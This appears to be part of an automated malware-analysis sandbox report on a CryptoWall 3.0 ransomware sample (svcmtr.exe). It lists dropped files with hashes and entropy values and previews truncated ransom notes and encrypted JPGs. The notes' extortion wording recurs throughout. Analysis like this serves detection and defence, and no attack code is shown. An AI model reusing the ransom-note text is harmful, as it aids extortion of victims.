                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Document Themes 14\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Document Themes 14\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\1033\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\1033\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25742
                                                                                                                          Entropy (8bit):7.991419317490656
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GWeV3Ho9TPi2mcdaVz24NhL83BklUHkx+2bSV:ReV4F1mcEF28IkkpV
                                                                                                                          MD5:0339132F2367D1D45D7692594961A26D
                                                                                                                          SHA1:ADA62838245E7948DD74731B0FEF44B3BD2324E3
                                                                                                                          SHA-256:4398B78F4FE4AD32AE264A9574A428A686C6AD76D8C039A64AB5B3D03D7610D4
                                                                                                                          SHA-512:5CB6AF1942F02C1BAD0629CE44BF42E99A2D793160A2F781D6DD773B5259F9F5780425B1DE2478C386EC5F53BE6E1A3AA2E9A04623308DBC6C0C6E8C64A5CE15
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..............hP@..b...-...grCl0....ft.+c.L?....H......`#......87vW...q`..::CL3-......P....-7~?.....tb...U....B.....Y?......|. t.4@.0ug..2..T.PO.....EH..4..u..e...`..s..<....v2.q.;.x..O...qQ\"4....../....g.h9......V......F..55.E5w8..$|....|..b.....h.+..H ...zS........a...*...u&.....0l.l.l..v._aq.\w,K[..wE1-..).........W..%x..{&..&_..K#Qbc..T>......%..il$#%........m.8m......%F../....y.p...2Y....../..6.V..9..J;4*h2 k...~.E.|.<.p...J2.R.nW..T.K./....2..\.id..>.(.d..5...._.m.ce*H.....].5.xV...._A.A..=......{...].2|.bV..Y.p.C.i.k.P%S..1.>...(...?.......w.R..F\.).-..&+....

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25742
                                                                                                                          Entropy (8bit):7.991419317490656
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GWeV3Ho9TPi2mcdaVz24NhL83BklUHkx+2bSV:ReV4F1mcEF28IkkpV
                                                                                                                          MD5:0339132F2367D1D45D7692594961A26D
                                                                                                                          SHA1:ADA62838245E7948DD74731B0FEF44B3BD2324E3
                                                                                                                          SHA-256:4398B78F4FE4AD32AE264A9574A428A686C6AD76D8C039A64AB5B3D03D7610D4
                                                                                                                          SHA-512:5CB6AF1942F02C1BAD0629CE44BF42E99A2D793160A2F781D6DD773B5259F9F5780425B1DE2478C386EC5F53BE6E1A3AA2E9A04623308DBC6C0C6E8C64A5CE15
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..............hP@..b...-...grCl0....ft.+c.L?....H......`#......87vW...q`..::CL3-......P....-7~?.....tb...U....B.....Y?......|. t.4@.0ug..2..T.PO.....EH..4..u..e...`..s..<....v2.q.;.x..O...qQ\"4....../....g.h9......V......F..55.E5w8..$|....|..b.....h.+..H ...zS........a...*...u&.....0l.l.l..v._aq.\w,K[..wE1-..).........W..%x..{&..&_..K#Qbc..T>......%..il$#%........m.8m......%F../....y.p...2Y....../..6.V..9..J;4*h2 k...~.E.|.<.p...J2.R.nW..T.K./....2..\.id..>.(.d..5...._.m.ce*H.....].5.xV...._A.A..=......{...].2|.bV..Y.p.C.i.k.P%S..1.>...(...?.......w.R..F\.).-..&+....

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23502
                                                                                                                          Entropy (8bit):7.989597054483229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GfCSVIyvTR3mc29O2OT2D3NuH7CippPeIjaC4SS0BykpJXXiy48:G6SVfLR3mX9OvT2bWCwpmGaIS04aXZV
                                                                                                                          MD5:FFAE79CE613270080C108F60EDDF0AE4
                                                                                                                          SHA1:805E17C047FFD31A5AD56D49D178FB2EDF83F4D1
                                                                                                                          SHA-256:4F3C1E25D763EE4FCA3C0E6FE5B4EFBCBA4B80FAFFF04AC40B5BA953BC083C47
                                                                                                                          SHA-512:6F8C4CBFABCA069176C1696B6B9EC8A6E8C1F48743A6A600838922D6A6BE69B0B1F5288F39C1844194F6042C041DE7C3AD0637F4A4A1C38E002E4C3921A5BEED
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..[.X...B'W....VQ.+Z..`...|)...~1..>..=5S......=...2@.U..l..M.D..|.....1MY w..u..'.....>..CX...3v.u..v&...i.w.........K.B....x^].......2.A...,>.`..:a..,...[../.|.1e.@P.(v.r...O..0-.I.....D......`.2.Lf&..T.*.e.r......_>.....=.!(....^..!.|......5.z\oVcD;.r..?.(......\...x.,n)A.3.....N.@..j....:1...}.qn...._*S.....X.w...h.....5..A7FJ.H.Mu..v[f..c.a.....`......1H..bkk..U5t.../]A_.....&.^Hd.#0I...F..o >a.<..m]....5?..Zz..=.^......s......Z"\..d.B...i.J.u?u.Z0.....V...\.H..g..iK.T.b.E.d+.......O.U..r).I...4...>...U.,.......SG.>.~.Q_KG..j.R}&..B....}a..M...r.v..Qh!^..C9.....

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23502
                                                                                                                          Entropy (8bit):7.989597054483229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GfCSVIyvTR3mc29O2OT2D3NuH7CippPeIjaC4SS0BykpJXXiy48:G6SVfLR3mX9OvT2bWCwpmGaIS04aXZV
                                                                                                                          MD5:FFAE79CE613270080C108F60EDDF0AE4
                                                                                                                          SHA1:805E17C047FFD31A5AD56D49D178FB2EDF83F4D1
                                                                                                                          SHA-256:4F3C1E25D763EE4FCA3C0E6FE5B4EFBCBA4B80FAFFF04AC40B5BA953BC083C47
                                                                                                                          SHA-512:6F8C4CBFABCA069176C1696B6B9EC8A6E8C1F48743A6A600838922D6A6BE69B0B1F5288F39C1844194F6042C041DE7C3AD0637F4A4A1C38E002E4C3921A5BEED
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..[.X...B'W....VQ.+Z..`...|)...~1..>..=5S......=...2@.U..l..M.D..|.....1MY w..u..'.....>..CX...3v.u..v&...i.w.........K.B....x^].......2.A...,>.`..:a..,...[../.|.1e.@P.(v.r...O..0-.I.....D......`.2.Lf&..T.*.e.r......_>.....=.!(....^..!.|......5.z\oVcD;.r..?.(......\...x.,n)A.3.....N.@..j....:1...}.qn...._*S.....X.w...h.....5..A7FJ.H.Mu..v[f..c.a.....`......1H..bkk..U5t.../]A_.....&.^Hd.#0I...F..o >a.<..m]....5?..Zz..=.^......s......Z"\..d.B...i.J.u?u.Z0.....V...\.H..g..iK.T.b.E.d+.......O.U..r).I...4...>...U.,.......SG.>.~.Q_KG..j.R}&..B....}a..M...r.v..Qh!^..C9.....

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG

                                                                                                                          Download File
